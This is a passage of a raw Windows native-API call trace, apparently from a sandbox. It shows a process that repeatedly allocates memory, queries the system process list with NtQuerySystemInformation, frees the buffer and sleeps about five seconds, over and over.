RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.230] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.243] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.250] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.258] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.267] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.281] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.288] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.304] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.320] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.342] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.351] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.401] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.420] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 